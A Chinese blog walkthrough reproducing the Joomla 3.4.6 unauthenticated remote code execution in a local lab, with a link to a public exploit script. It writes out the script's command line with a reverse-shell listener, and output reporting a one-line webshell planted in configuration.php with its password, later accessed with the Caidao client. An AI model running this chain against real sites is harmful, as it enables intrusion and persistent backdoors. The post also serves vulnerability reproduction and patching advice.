当前位置: 代码迷 >> 综合 >> Joomla-3.4.6远程代码执行复现
  详细解决方案

Joomla-3.4.6远程代码执行复现

热度:39   发布时间:2023-11-20 05:20:00.0

v2-a61b3759dc48b31963e86ec13b90f46c_b.jpg


?影响范围

Joomla3.0.0 至 3.4.6

强烈建议用户前往官方下载更新至最新版本

官方地址downloads.joomla.org

附:cxsecurity.com/issue/WL

漏洞原理

Joomla会话以 PHPObjects 的形式存储在数据库中,并且由 PHP 会话函数处理。但是未认证用户的会话也可以进行存储,因此攻击者通过精心构造的请求包,通过 PHP 对象注入,可以导致未认证的远程代码执行。

1、安装部署

下载:downloads.joomla.org/it

浏览器访问http://127.0.0.1/Joomla/3.4.6/安装

配置


v2-409187340a52332c46b6b19e0f98b7a9_b.jpg


数据库


v2-cd932fb3f4548ec450dd6712e3af7d99_b.jpg


安装


v2-8072f23a7c886b35a7561fd904dfb281_b.jpg


安装成功

github.com/SecurityCN/V


v2-ea77c5ab842971b39eb49c86d339add9_b.jpg


python3Joomla-3.4.6-RCE.py -t 10.211.55.3/joomla/ -e -l192.168.0.105-p4444


v2-0816fdb686f65f4613009cc56e4ce42d_b.jpg


执行成功反弹shell并在“configuration.php”写入随机密码的一句话木马

localhost:Joomla3.4.6-RCE fuwei$ python3 Joomla-3.4.6-RCE.py -t 10.211.55.3/joomla/ -e -l 192.168.0.105 -p 4444[*] Getting Session Cookie ..[*] Getting CSRF Token ..[*] Sending request ..[+] Vulnerable[*] Getting Session Cookie ..[*] Getting CSRF Token ..[*] Sending request ..[+] Backdoor implanted, eval your code at 10.211.55.3/joomla//con in a POST with fvyvnyltqherkhcqlderuyodbduxehuptliptfmxlbvfyejmcf[*] Now it's time to reverse, trying with a system + perl

可以用NC 监听和菜刀连接由于我的PHP是Windows环境所以无法反弹只能通过菜刀连接

caidao密码为 fvyvnyltqherkhcqlderuyodbduxehuptliptfmxlbvfyejmcf


v2-55ad6c364949447124d61ccb42ceceff_b.jpg


菜刀连接成功


v2-b28c7cda7ab5a6559a77998ead608f53_b.jpg


?修复方案:

强烈建议用户前往官方下载更新至最新版本

官方地址downloads.joomla.org

附:cxsecurity.com/issue/WL

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

公众号:


v2-be16fc9802cb2dd23f77ec16f33951f8_b.jpg


thelostworld:


v2-20e48f777f98d9c420a04d5037b12820_b.jpg


个人知乎:zhihu.com/people/fu-wei


个人简书:jianshu.com/u/bf0e38a8d